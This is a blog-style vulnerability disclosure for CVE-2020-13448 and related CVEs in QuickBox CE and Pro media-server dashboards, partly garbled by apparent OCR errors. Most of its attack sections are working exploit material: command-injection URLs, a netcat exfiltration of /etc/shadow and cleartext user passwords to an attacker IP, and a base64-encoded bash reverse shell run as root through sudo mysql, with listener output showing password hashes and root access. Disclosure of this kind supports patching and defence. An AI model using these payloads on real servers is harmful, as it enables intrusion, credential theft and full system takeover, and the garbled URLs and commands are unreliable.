29 MAY 2020 / CVE

CVE-2020-13448 - QuickBox - Authenticated RCE/Privilege Escalation

= Impact

QuickBox CE <= v2.5.5 and QuickBox Pro <= 2.1.8 are both affected by an authenticated remote code execution (RCE) (CVE-2020-13448) and privilege escalation vulnerabilities (CVE-2020-13694 and CVE-2020-13695).

A low-privileged user can execute arbitary commands on the server with the privileges of the user running the web server, and in turn escalate privileges to root by abusing weak sudo rules.

What is QuickBox?

QuickBox is a complete media server application and services management system, with a simplistic approach to achieving easy application installation and management from a beautifully designed dashboard, allowing users the ability to interact with their media server on a professional grade level.

Versions affected

- QuickBox CE v2.5.5 and prior
- · QuickBox Pro v2.1.8 and prior

Wulnerability

Since this CVE covers two separate "versions" of QuickBox, with almost identical vulnerabilities, I have split the post into two parts; one for QuickBox CE and one for QuickBox Pro.

QuickBox CE (Community Edition)

The vulnerability is located in the file <code>/inc/config.php</code>. This file is mainly used to setup configuration parameters to be used later by the application. At the end of this file we see that it also accept a GET parameter which will be used, unsanitized, in a call to <code>shell_exec</code>, leading to a command injection vulnerability.

Below is a snippet of the vulnerable code from config.php

```
switch (intval($ GET['id'])) {
case 88:
  $process = $_GET['servicestart'];
    if ($process == "resilio-sync"){
    shell_exec("sudo systemctl enable $process");
    shell_exec("sudo systemctl restart $process");
} elseif ($process == "shellinabox"){
       shell_exec("sudo systemctl enable $process");
       shell_exec("sudo systemctl restart $process");
     } elseif ($process == "emby-server"){
       shell exec("sudo systemctl enable $process"):
       shell_exec("sudo systemctl restart $process");
     } elseif ($process == "headphones"){
       shell_exec("sudo systemctl enable $process");
    shell_exec("sudo systemctl restart $process");
} elseif ($process == "lidarr"){
       shell_exec("sudo systemctl stop $process");
    shell_exec("sudo systemctl disable $process");
} elseif ($process == "nzbget"){
       shell_exec("sudo systemctl enable $process");
       shell_exec("sudo systemctl restart $process");
    } elseif ($process == "plexmediaserver"){
   shell_exec("sudo systemctl enable $process");
    shell_exec("sudo systemctl restart $process");
} elseif ($process == "Tautulli"){
       shell_exec("sudo systemctl enable $process");
    shell_exec("sudo systemctl restart $process");
} elseif ($process == "ombi"){
       shell exec("sudo systemctl enable $process"):
       shell_exec("sudo systemctl restart $process");
     } elseif ($process == "radarr"){
       shell_exec("sudo systemctl enable $process");
    shell_exec("sudo systemctl restart $process");
} elseif ($process == "subsonic"){
       shell_exec("sudo systemctl enable $process");
    shell_exec("sudo systemctl restart $process");
} elseif ($process == "transmission-daemon"){
       shell_exec("sudo systemctl enable $process");
       shell_exec("sudo systemctl restart $process");
    } elseif ($process == "qbittorrent"){
  shell_exec("sudo systemctl enable $process@$username");
       shell_exec("sudo systemctl restart $process@$username");
```

```
} else {
   shell_exec("sudo systemctl restart $process@$username");
}
```

Since we can control both \(\\$_GET['id'] \) and \(\\$_GET['servicestart'] \) we can inject our own commands into the last call to \(\) shell_exec and achieve remote code execution.

The complete vulnerable file can be found here:

https://github.com/QuickBox/QB/blob/6f4253d82ccfdc85641fa6b27712569890687482/dashboard/inc/config.php

>> Exploit

Exploiting this vulnerability is pretty straight forward.

By sending a GET request to the following URL: https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;<COMMAND-HERE>; the command is executed on the server as the www-data user.

>> Dump /etc/shadow

Upon further analysis we found that the www-data user can run quite a few commands and programs as root using sudo - without a password.

One of the commands that can be executed is grep.

But since the output of the command executed by shell_exec isn't displayed on the website, we won't see any output when trying to exfiltrate sensitive information.

One way to get a around this limitation is to use grep to write the contents of /etc/shadow to a file we can read from and use netcat to send the file back to our listener.

If we setup a netcat listener and visit the following URL we can trigger the exploit and receive the output of /etc/shadow https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=886servicestart=a;sudo+grep+.+/etc/shadow+>pwds;nc+<OUR-IP-ADDRESS>+9001+<+pwds;rm+pwds;

```
s1gh@kali~$: nc -lvnp 9001
listening on [any] 9001
connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 58814
root:$6$1YAppq04$ParMSRU7IDtSULWHfA4sy8iQCm9/nJP.RksoLau0zBHp0VPb0fYBipZlcQ8VVvnvArRC37r3y/hBLgYRDZ5:18406:0:99999:7:::
daemon:*:17920:0:99999:7:::
bin:*:17920:0:99999:7:::
sys:*:17920:0:99999:7::
sync:*:17920:0:99999:7::
games:*:17920:0:99999:7:::
man:*:17920:0:99999:7:::
lp:*:17920:0:99999:7:::
mail:*:17920:0:99999:7::
news:*:17920:0:99999:7:::
uucp:*:17920:0:99999:7::
proxv:*:17920:0:99999:7:::
 ww-data:*:17920:0:99999:7:::
backup:*:17920:0:99999:7:::
list:*:17920:0:99999:7:::
irc:*:17920:0:99999:7:..
gnats:*:17920:0:99999:7:::
nobody:*:17920:0:99999:7:::
systemd-timesync:*:17920:0:99999:7:::
systemd-network:*:17920:0:99999:7:::
systemd-resolve:*:17920:0:99999:7:::
systemd-bus-proxy:*:17920:0:99999:7:::
syslog:*:17920:0:99999:7:::
_apt:*:17920:0:99999:7:::
postfix:*:17920:0:99999:7:::
sshd:*:17920:0:99999:7:::
uuidd:*:17920:0:99999:7::
messagebus:*:17920:0:99999:7:::
s1gh:$6$hf2vF79G$APAqRRKP4Jax27xzZE1npHlumLWaDsgaHo3z/Sw6Z3tEnemam9h.EB1pXFx1Jy9mZ/jqaQoTBlL7Tph1AZb210:18406:0:99999:7:::
memcache:!:18406:0:99999:7:::
vnstat:*:18406:0:99999:7::
debian-deluged:*:18406:0:99999:7:::
ftp:*:18406:0:99999:7:::
shellinahov:*:18406:0:99999:7:::
test:$6$qPhsfmxz$Jm529ZLBiigWAhcRO3svLm4HLRFZsYgkWso0dTa2d6Bxb8UJd6LuCI1AVaOutXVheu2Z2iWugRQFQLeZGCecp::18406:0:99999:7:::
s1gh2:$6$zaGzrHfj$1Qgs5AWlruq2YJpPFs6Tj02QNtd.WpiAV7WMV9aQE1nJKAC1LdYTh/52/HkvBeYkBhzob/E1q6JwJp6zKGRHx.:18406:0:99999:7:::
```

>> Privilege escalation

Investigating further we found that the cleartext password of every QuickBox CE user is stored in *.db files in root. Since we can run grep as root we can dump all admin and non-admin passwords, and exfiltrate the passwords in the same way we did with /etc/shadow. This in turn gives us a way to escalate our privileges to that of the admin user. And since the admin user can sudo without a password, we can now gain root access.

To trigger the exploit, setup a netcat listener and visit the following URL:

https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;sudo+grep+-R+.+/root/+--include="*.info">pwds;nc+<OUR-IP-ADDRESS>+9001<pwds;

```
slgh@kali-$: nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 59136
/root/slgh2.info:slgh2 : Password1234
/root/slgh2.info:108
/root/information.info: Seedbox can be found at https://slgh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)
/root/information.info: If you need to restart rtorrent/irssi, you can type 'reload'
/root/information.info: https://slgh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)
/root/test.info:test : test
/root/slgh.info:# https://slgh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)
```

The information.info file will contain the admin user credentials. In this case: https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)

```
s1gh@kali~$: ssh s1gh@192.168.1.250 -p 4747
s1gh@192.168.1.250's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 5.3.18-3-pve x86 64)
 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage
2 packages can be updated.
0 updates are security updates.
New release '18.04.4 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun May 24 20:53:02 2020 from 192.168.1.126
 Welcome Back !
    * Dashboard: https://192.168.1.250
    * Support: https://plaza.quickbox.io
* Donate: https://quickbox.io/donate
[s1gh@Ubuntu1604]:(0b)~$ sudo su
   You are running QuickBox v2.5.5
     Your logged IP is 192.168.1.126:0.0
Your BASH version is 4.3
     Mon May 25 21:16:30 UTC 2020
Ubuntu1604:/home/s1gh# whoami;id
uid=0(root) gid=0(root) groups=0(root)
```

QuickBox Pro

Due to a partially shared code base between CE and Pro, exactly the same command injection vulnerability can be found in the Proversion.

The only difference is that /inc/config.php no longer exist and part of the source code is encrypted, so we had to manually find the injection point.

After a while we found the injection point in index.php.

The exact same parameters as with the CE version can be abused to achieve RCE.

>> Exploit

By sending a GET request to the following URL: <a href="https://<quickBOX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;<command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;<command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;<command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;<command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;<command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;<command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;<command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php?id=886servicestart=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php.address=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php.address=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php.address=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php.address=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php.address=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php.address=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php.address=a;</command=https://cquickBoX-PRO-IP-ADDRESS>/index.php.addre

>>> Privilege Escalation

Since the www-data user can execute sudo mysql without a password, we can modify our GET request in such a way that we get a reverse shell as root instantly instead of first getting a shell as the www-data user and then doing the privilege escalation.

Our reverse shell will have a few "bad characters", so first we create a base64 encoded string of the following reverse shell: bash -i >6 /dev/tcp/<YOUR-IP>/<YOUR-PORT> 0>61

```
slgh@kali~$: echo -n "sudo mysql -e '\! /bin/bash -c \"bash -i >& /dev/tcp/192.168.1.126/9001 0>&1\"'" | base64 c3VkbyBteXNxbCAtZSAnXCEgL2Jpbi9iYXNoICijICJiYXNoICipID4mIC9kZXYvdGNwLzESMi4xNjgvMS4xMjVvOTAwMSAwPiYxIic=
```

Now that we have the base64 encoded reverse shell, we can visit the following url in order to trigger the exploit (remember to first setup a netcat listener on your chosen port):

[https://<QUICKBOX-PRO-IP-ADDRESS>?id=886servicestart=a;echo+<BASE64-ENCODED-STRING>|base64+-d|bash;]

Just type any one of the following commands to turn on different bash prompts commandprompt_on
this prompt shows last command used & more powerprompt_on (default)
this prompt shows colorful system data - cpu, load etc. basicprompt_on
this prompt shows color coded load & cpu avg this turns off prompts and goes back to default

(2:37)# whoami;id whoami;id uid=0(root) gid=0(root) groups=0(root)

References

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13448
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13694
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13695
- https://www.exploit-db.com/exploits/48536
- https://github.com/s1gh/QuickBox-CE-2.5.5-Authenticated-RCE

CVE

TRYHACKME

TryHackMe: Wonderland

New week, new challenge. This is my writeup of the Wonderland machine.

CVE-2020-27985 - Security Onion - Local

1 post →

Hack The Box: RedCross Info Name: RedCross IP Address: 10.10.10.113 Operating System: Linux

HACKTHEBOX

Difficulty: 6.3/10 Base Points: 30 Enumeration As always we start with a nmap scan to determine which ports are

Privilege Escalation

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